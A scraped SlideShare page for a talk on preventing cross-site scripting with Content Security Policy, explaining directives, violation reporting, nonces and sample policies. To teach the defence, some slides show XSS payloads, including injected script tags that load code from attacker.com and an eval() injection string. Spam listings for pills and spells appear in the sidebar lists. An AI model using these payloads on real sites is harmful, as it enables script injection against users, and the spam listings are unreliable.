Submit Search
Upload
Preventing XSS with Content Security Policy
•
3 likes
•
2,277 views
K
Ksenia Peguero
Follow
Preventing XSS with Content Security Policy
Read less
Read more
Software
Report
Share
Report
Share
1 of 22
Download now
Download to read offline
Recommended
W3C Content Security Policy
W3C Content Security Policy
Markus Wichmann
Content security policy
Content security policy
Ronan Dunne, CEH, SSCP
Content Security Policy
Content Security Policy
Austin Gil
Http security response headers
Http security response headers
mohammadhosseinrouha
HTTP Security Headers
HTTP Security Headers
Ismael Goncalves
How to React to JavaScript Insecurity
How to React to JavaScript Insecurity
Ksenia Peguero
HTTP HOST header attacks
HTTP HOST header attacks
DefconRussia
Secure code practices
Secure code practices
Hina Rawal
Recommended
W3C Content Security Policy
W3C Content Security Policy
Markus Wichmann
Content security policy
Content security policy
Ronan Dunne, CEH, SSCP
Content Security Policy
Content Security Policy
Austin Gil
Http security response headers
Http security response headers
mohammadhosseinrouha
HTTP Security Headers
HTTP Security Headers
Ismael Goncalves
How to React to JavaScript Insecurity
How to React to JavaScript Insecurity
Ksenia Peguero
HTTP HOST header attacks
HTTP HOST header attacks
DefconRussia
Secure code practices
Secure code practices
Hina Rawal
AEM (CQ) Dispatcher Security and CDN+Browser Caching
AEM (CQ) Dispatcher Security and CDN+Browser Caching
Andrew Khoury
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
gmaran23
Attacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
Offzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A Bug
Lewis Ardern
Waf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
Lior Rotkovitch
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
SecuRing
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreak
Abraham Aranguren
Encoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
Marco Morana
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
Threat Hunting
Threat Hunting
Splunk
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
AllDayDevOps ZAP automation in CI
AllDayDevOps ZAP automation in CI
Simon Bennetts
Bypass file upload restrictions
Bypass file upload restrictions
Mukesh k.r
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Frans Rosén
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
RyanISI
THE ESSENTIAL ELEMENT OF YOUR SECURITY
THE ESSENTIAL ELEMENT OF YOUR SECURITY
ETDAofficialRegist
Ready player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOS
Cody Thomas
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
Synopsys jul1411
Synopsys jul1411
Samsung Electronics Egypt
Content Security Policy
Content Security Policy
Ryan LaBouve
More Related Content
What's hot
AEM (CQ) Dispatcher Security and CDN+Browser Caching
AEM (CQ) Dispatcher Security and CDN+Browser Caching
Andrew Khoury
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
gmaran23
Attacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
Offzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A Bug
Lewis Ardern
Waf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
Lior Rotkovitch
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
SecuRing
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreak
Abraham Aranguren
Encoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
Marco Morana
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
Threat Hunting
Threat Hunting
Splunk
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
AllDayDevOps ZAP automation in CI
AllDayDevOps ZAP automation in CI
Simon Bennetts
Bypass file upload restrictions
Bypass file upload restrictions
Mukesh k.r
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Frans Rosén
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
RyanISI
THE ESSENTIAL ELEMENT OF YOUR SECURITY
THE ESSENTIAL ELEMENT OF YOUR SECURITY
ETDAofficialRegist
Ready player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOS
Cody Thomas
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
What's hot
(20)
AEM (CQ) Dispatcher Security and CDN+Browser Caching
AEM (CQ) Dispatcher Security and CDN+Browser Caching
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
Attacking thru HTTP Host header
Attacking thru HTTP Host header
Offzone | Another waf bypass
Offzone | Another waf bypass
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A Bug
Waf bypassing Techniques
Waf bypassing Techniques
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreak
Encoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Threat Hunting
Threat Hunting
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
AllDayDevOps ZAP automation in CI
AllDayDevOps ZAP automation in CI
Bypass file upload restrictions
Bypass file upload restrictions
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
THE ESSENTIAL ELEMENT OF YOUR SECURITY
THE ESSENTIAL ELEMENT OF YOUR SECURITY
Ready player 2 Multiplayer Red Teaming Against macOS
Ready player 2 Multiplayer Red Teaming Against macOS
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Viewers also liked
Synopsys jul1411
Synopsys jul1411
Samsung Electronics Egypt
Content Security Policy
Content Security Policy
Ryan LaBouve
Surfer en toute legalite sur le net
Surfer en toute legalite sur le net
AAT's
Web Apps Security
Web Apps Security
Victor Bucutea
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
Binu Ramakrishnan
AppSec California 2017 CSP: The Good, the Bad and the Ugly
AppSec California 2017 CSP: The Good, the Bad and the Ugly
Eli Nesterov
AppSec USA 2016: Demystifying CSP
AppSec USA 2016: Demystifying CSP
Eli Nesterov
Formation expliquer internet et la loi par Vincent Ruy
Formation expliquer internet et la loi par Vincent Ruy
RUY
Breaking Bad CSP
Breaking Bad CSP
Lukas Weichselbaum
Getting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your Webapp
Francois Marier
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your Applications
Amazon Web Services
Security HTTP Headers
Security HTTP Headers
Chang Yu-Sheng
BSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity Model
Cigital
SYNOPSIS WRITING
SYNOPSIS WRITING
Prof. Mridul Panditrao
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
CNIL ..
Intervention CNIL : droit des internautes et obligations des e-marchands
Intervention CNIL : droit des internautes et obligations des e-marchands
Net Design
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare
SlideShare
What to Upload to SlideShare
What to Upload to SlideShare
SlideShare
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
SlideShare
Viewers also liked
(20)
Synopsys jul1411
Synopsys jul1411
Content Security Policy
Content Security Policy
Surfer en toute legalite sur le net
Surfer en toute legalite sur le net
Web Apps Security
Web Apps Security
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
AppSec California 2017 CSP: The Good, the Bad and the Ugly
AppSec California 2017 CSP: The Good, the Bad and the Ugly
AppSec USA 2016: Demystifying CSP
AppSec USA 2016: Demystifying CSP
Formation expliquer internet et la loi par Vincent Ruy
Formation expliquer internet et la loi par Vincent Ruy
Breaking Bad CSP
Breaking Bad CSP
Getting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your Webapp
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your Applications
Security HTTP Headers
Security HTTP Headers
BSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity Model
SYNOPSIS WRITING
SYNOPSIS WRITING
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
Intervention CNIL : droit des internautes et obligations des e-marchands
Intervention CNIL : droit des internautes et obligations des e-marchands
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare
What to Upload to SlideShare
What to Upload to SlideShare
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
Similar to Preventing XSS with Content Security Policy
Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
Amazon Web Services
Web Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
Samsung Open Source Group
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web Applications
Manish Shekhawat
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Research
[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD
Christopher Schmitt
[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design
Christopher Schmitt
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
Agile Testing Alliance
The importance of normalizing your security data to ECS
The importance of normalizing your security data to ECS
Elasticsearch
[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design
Christopher Schmitt
Using AWS to Achieve Both Autonomy and Governance at 3M
Using AWS to Achieve Both Autonomy and Governance at 3M
Casey Lee
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
Amazon Web Services
Running your Spring Apps in the Cloud Javaone 2014
Running your Spring Apps in the Cloud Javaone 2014
cornelia davis
MeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
MeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
Simo Ahava
Secure Development on the Salesforce Platform - Part 2
Secure Development on the Salesforce Platform - Part 2
Salesforce Developers
Integrating Application Security into a Software Development Process
Integrating Application Security into a Software Development Process
Achim D. Brucker
Introduction to AngularJS
Introduction to AngularJS
Marco Vito Moscaritolo
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
Jollen Chen
Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
Incident Response on AWS - A Practical Look.pdf
Incident Response on AWS - A Practical Look.pdf
Amazon Web Services
Similar to Preventing XSS with Content Security Policy
(20)
Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
Web Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web Applications
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD
[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
The importance of normalizing your security data to ECS
The importance of normalizing your security data to ECS
[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design
Using AWS to Achieve Both Autonomy and Governance at 3M
Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
Running your Spring Apps in the Cloud Javaone 2014
Running your Spring Apps in the Cloud Javaone 2014
MeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
MeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
Secure Development on the Salesforce Platform - Part 2
Secure Development on the Salesforce Platform - Part 2
Integrating Application Security into a Software Development Process
Integrating Application Security into a Software Development Process
Introduction to AngularJS
Introduction to AngularJS
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
Locking the Throneroom 2.0
Locking the Throneroom 2.0
Incident Response on AWS - A Practical Look.pdf
Incident Response on AWS - A Practical Look.pdf
Recently uploaded
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the past
Papp Krisztián
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
SelfMade bd
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
VictoriaMetrics
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
masabamasaba
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
chiefasafspells
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
masabamasaba
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
masabamasaba
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
AmarnathKambale
tonesoftg
tonesoftg
lanshi9
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
masabamasaba
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
masabamasaba
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
Jittipong Loespradit
Recently uploaded
(20)
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the past
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
tonesoftg
tonesoftg
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
Preventing XSS with Content Security Policy
1.
1 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. KSENIA DMITRIEVA Preventing XSS with Content Security Policy (CSP)
2.
2 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Introduction Who am I? • Senior Security Consultant @Cigital • @KseniaDmitrieva • Ballroom dancer
3.
3 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Content Security Policy (CSP) Agenda Questions to answer today: • Why do we need CSP? • What is CSP? • How is the policy configured and enforced? • How is CSP applied to existing web applications? • What improvements is CSP 1.1 bringing? • More questions?
4.
4 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. How to Protect from XSS? Reflected Stored DB DOM-based
5.
5 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. How to Protect from XSS? Reflected Stored DB DOM-based
6.
6 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS GET http://example.com/index.html?s=<script>alert('xss');</script> <% String search_word = "<script>alert('xss');</script>"; %> <p> Search results for <script>alert('xss');</script></p> <% String search_word = request.getParameter("s"); %> <p> Search results for (<%= search_word %>)</p> Injecting inline JavaScript Vulnerable Server-Side JSP Code Malicious Request Server Response
7.
7 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS GET http://example.com/index.html?s=apple<script src="http://attacker.com/parse_page.js"/> <% String search_word = "apple<script src="http://attacker.com/parse_page.js"/>"; %> <p> Search results for apple<script src="http://attacker.com/parse_page.js"/></p> <% String search_word = request.getParameter("s"); %> <p> Search results for (<%= search_word %>)</p> Injecting a third-party JavaScript Vulnerable Server-Side JSP Code Malicious Request Server Response
8.
8 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS user_input="firstname'); alert('xss"; eval("display"+"('"+"firstname'); alert('xss"+"');"); Result: display('firstname'); alert('xss'); var function_name = "display"; var user_input = document.getElementById("parameter").value; eval(function_name+"('"+user_input+"');"); Result: display('firstname'); Injecting into eval() Vulnerable JavaScript Malicious Input JavaScript Result
9.
9 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. What is Content Security Policy? CSP defines a list of resource directives: • script-src • connect-src • font-src • frame-src • style-src • img-src • media-src • object-src First Name Last Name Address Email Submit third-party <iframe src= "http://attacker.com/ hello.htm"> </iframe> <script> Inline JavaScript </script> <script src="https://malicioussites.com/spam.js"/> <script src="https://jquery.org/libraries/jquery.js" /> Content Security Policy: • Restricts ad-hoc XSS vectors such as inline scripts, third-party scripts, iframes, CSS, and eval(). • Imposes restrictions on resources based on their origin.
10.
10 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Sample CSP Policies Policy is sent by the server as an HTTP header: Content-Security-Policy: script-src 'self' https://apis.google.com Any malicious inline scripts or scripts hosted elsewhere will not be executed. Can a page with the following policy load an image from http://www.bbc.com/? Content-Security-Policy: default-src 'self' *.mydomain.com; img-src * Can a page with the following policy load a script from http://attacker.com? Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *; fonts-src https://themes.googleusercontent.com X Can a page with the following policy load a CSS from http://wordpress.org? Content-Security-Policy: script-src 'self'; frame-src 'none'; object-src 'none' Configure frame-src and object-src as well as script-src, since XSS may be executed by injecting malicious iframes or plugins.
11.
11 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Reporting Report violations of the policy to the server: report-uri directive Content-Security-Policy: default-src 'self'; report-uri http://example.com/reporting/parser.php; { "csp-report": { "document-uri": "http://example.com/page.html", "referrer": "http://evil.example.com/", "blocked-uri": "http://evil.example.com/evil.js", "violated-directive": "script-src 'self' https://apis.google.com", "original-policy": "default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php" } } Sample reported JSON: Different browsers format reports differently!
12.
12 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Reporting and Enforcing • Content-Security-Policy header with report-uri enforces the policy • Content-Security-Policy-Report-Only header reports policy violations, but does not enforce the policy Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php • Use both headers: one to enforce the old policy and another to test out the new policy Content-Security-Policy: default-src 'self' *.google.com; Content-Security-Policy-Report-Only: default-src 'self' *.google.com; script-src 'self' https://apis.google.com; frame-src 'self'; report-uri http://example.com/reporting/parser.php
13.
13 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Externalizing JavaScript <!doctype html> <html> <head> <title>My Page</title> <script src="mypage.js"></script> </head> <body> <button>Click me!</button> </body> </html> Externalize all inline script, inline CSS, event handlers and eval() constructs. function repeated() {...} function repeatedTask() { console.log('lapse'); repeated(); } function clickHandler(e) { setTimeout(repeatedTask, 1000); } function init() {...} document.addEventListener('DOMContentLoaded', function () { document.querySelector('button') .addEventListener('click', clickHandler); init(); }); Without CSP With CSP Page.html mypage.js <!doctype html> <html> <head> <title>My Page</title> <script type="text/javascript"> function repeated() { ... } function clickHandler(element) { setTimeout("console.log('lapse'); repeated()", 1000); } function init() { ... } </script> </head> <body onload="init();"> <button onclick="clickHandler(this)"> Click me! </button> </body> </html>
14.
14 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Externalizing JavaScript <!doctype html> <html> <head> <title>My Page</title> <script src="mypage.js"></script> </head> <body> <button>Click me!</button> </body> </html> Externalize all inline script, inline CSS, event handlers and eval() constructs. function repeated() {...} function repeatedTask() { console.log('lapse'); repeated(); } function clickHandler(e) { setTimeout(repeatedTask, 1000); } function init() {...} document.addEventListener('DOMContentLoaded', function () { document.querySelector('button') .addEventListener('click', clickHandler); init(); }); With CSP Page.html mypage.js
15.
15 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Adoption http://blog.veracode.com/2013/11/security-headers-on-the-top-1000000-websites-november-2013-report/ CSP 1.0 is supported by the following browsers: • Internet Explorer – partial support, requires a prefix: X-Content-Security-Policy • Firefox desktop 23 Firefox for Android 30 Chrome desktop 25 Chrome for Android 35 Safari desktop 7 iOS Safari 7 Opera desktop 22 • Opera Mini – no support CSP adoption rate is slow. Most of the CSP policies use unsafe directives: unsafe-eval, unsafe-inline.
16.
16 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Real World CSP Adoption Examples Twitter uses CSP on all their services (January 2015). Content-Security-Policy: default-src https:; connect-src https:; font-src https: data:; frame-src https: twitter:; frame-ancestors https:; img-src https: data:; media-src https:; object-src https:; script-src 'unsafe-inline' 'unsafe- eval' https:; style-src 'unsafe-inline' https:; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXFVZXO2LGOQ%3D%3D%3D %3D%3D%3D&ro=false; Content-Security-Policy: default-src 'self'; connect-src https://caps.twitter.com https://caps-staging.twitter.com https://twitter.com/i/cards/api/ https://cards.twitter.com; font-src https://ton.twimg.com data:; frame-src https://*; frame-ancestors https://*; img-src https://* data:; media-src 'none'; object-src 'self'; script-src https://ton.twimg.com; style-src 'unsafe-inline' https://ton.twimg.com; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXMNQXEZDT&ro=false;
17.
17 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Real World CSP Adoption Examples Yelp uses CSP on www.yelp.com (January 2015). Content-Security-Policy: default-src *; script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net *.atlassolutions.com; style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;
18.
18 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Content Security Policy 1.1 Using unsafe-eval and unsafe-inline is equal to turning the CSP off! CSP 1.1 (or level 2) addresses the issue of broken policies: • nonce-source directive • hash-source directive • policies in the <meta> tags CSP 1.1 status: W3C Last Call Working Draft, 03 July 2014 CSP 1.1 is currently partially supported by Firefox 31 and Chrome 30 <meta name="content-security-policy" content="script-src 'self'"/>
19.
19 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Nonce Directive • Add a nonce attribute to every inline script in the page <script nonce="ZDU4eHjBDQ"> function onButtonClick() … </script> • Add the nonce directive to the script-src policy • Set a new nonce each time the page is requested • Do not automatically add a nonce to every JavaScript in the response • Add a nonce to inline JavaScript in the view template Content-Security-Policy: script-src "nonce=ZDU4eHjBDQ" 'self'
20.
20 | Copyright
